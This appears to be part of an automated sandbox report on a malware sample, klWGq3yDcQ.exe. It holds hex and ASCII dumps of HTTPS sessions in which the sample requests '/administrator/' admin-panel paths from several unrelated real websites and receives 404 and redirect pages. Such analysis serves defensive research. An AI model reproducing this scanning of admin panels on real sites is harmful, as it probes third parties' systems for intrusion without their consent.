                                                                                                                                                                                                    2023-11-26 05:59:32 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-cache, must-revalidate, max-age=0content-security-policy: up
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16322INData Raw: 33 66 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 62 74 2d 74 68 65 6d 65 3d 22 4c 61 77 20 46 69 72 6d 20 31 2e 30 2e 36 22 3e 0a 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70
                                                                                                                                                                                                    Data Ascii: 3fba<!DOCTYPE html><html class="no-js" lang="en-US" data-bt-theme="Law Firm 1.0.6"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><meta name="mobile-web-ap
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16384INData Raw: 37 66 37 38 0d 0a 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 0a 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 74 5f 62 62 5f 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: 7f78t-template.is-layout-grid){gap: 1.25em;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}</style><link rel='stylesheet' id='bt_bb_content
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16256INData Raw: 74 43 6f 6e 74 65 6e 74 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 62 74 53 69 64 65 62 61 72 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 62 74 43 6f 6e 74 65 6e 74 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 62 74 53 69 64 65 62 61 72 20 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 62 74 43 6f 6e 74 65 6e 74 20 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 62 74 53 69 64 65 62 61 72 20 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 68
                                                                                                                                                                                                    Data Ascii: tContent a.button.alt:hover, .woocommerce-page .btSidebar a.button.alt:hover, .woocommerce-page .btContent a.button.alt:hover, .woocommerce .btSidebar .button.alt:hover, .woocommerce .btContent .button.alt:hover, .woocommerce-page .btSidebar .button.alt:h
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC128INData Raw: 33 37 65 38 0d 0a 3a 20 23 66 66 66 66 66 66 3b 0a 7d 0a 2e 62 74 5f 62 62 5f 62 75 74 74 6f 6e 5f 74 65 78 74 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 36 36 32 64 39 31 3b 0a 7d 0a 2e 62 74 5f 62 62 5f 74 65 78 74 20 75 6c 20 6c 69 20 7b 0a 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 64 69 73 63 3b 0a 7d 0a 2e 62 74 5f 62 62 5f 74 65 78 74 20 75 6c 20 6c 69 20 75 6c 20 6c
                                                                                                                                                                                                    Data Ascii: 37e8: #ffffff;}.bt_bb_button_text:hover {color: #662d91;}.bt_bb_text ul li {list-style: disc;}.bt_bb_text ul li ul l
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC14192INData Raw: 69 20 7b 0a 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 63 69 72 63 6c 65 3b 0a 7d 0a 2e 62 74 4c 69 67 68 74 44 61 72 6b 48 65 61 64 65 72 20 2e 62 74 42 65 6c 6f 77 4c 6f 67 6f 41 72 65 61 2c 20 2e 62 74 4c 69 67 68 74 44 61 72 6b 48 65 61 64 65 72 20 2e 74 6f 70 42 61 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 41 46 39 39 42 44 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 7d 0a 2e 68 65 61 64 65 72 2d 74 6f 70 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 0a 7d 0a 2e 68 65 61 64 65 72 2d 74 6f 70 20 68 35 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20
                                                                                                                                                                                                    Data Ascii: i {list-style: circle;}.btLightDarkHeader .btBelowLogoArea, .btLightDarkHeader .topBar { background-color: #AF99BD; color: #fff;}.header-top{display: inline-flex;padding-bottom:5px;}.header-top h5{padding-top: 10px;padding-bottom:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    76192.168.2.45629572.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC651INData Raw: 32 37 66 0d 0a 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27f/administrator/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    77192.168.2.45650034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC183OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 32 2e 34 31 34 31 30 33 35 38 35 31 30 34 31 35 37 32 37 31 33 36 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978372.41410358510415727136Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    78192.168.2.45629078.128.62.1384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC187OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC302INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheLocation: https://www.integraledu.hr/administrator/index.phpCache-Control: max-age=600Expires: Sun, 26 Nov 2023 06:09:33 GMTContent-Length: 323Connection: close
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.integraledu.hr/administrator/index.php">here</a>.</p><hr><addres


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    79192.168.2.456271185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC347INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 326Connection: closeLocation: http://www.grantstech.io/administrator/Cache-Control: max-age=0Expires: Sun, 26 Nov 202
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC326INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/administrator/">here</a>.</p><hr><address>Apache/2.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    80192.168.2.45657334.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC179OUTGET /en/administrator HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 32 2e 34 38 32 31 30 33 35 35 33 39 37 31 30 35 38 33 31 38 36 31 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978372.48210355397105831861Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
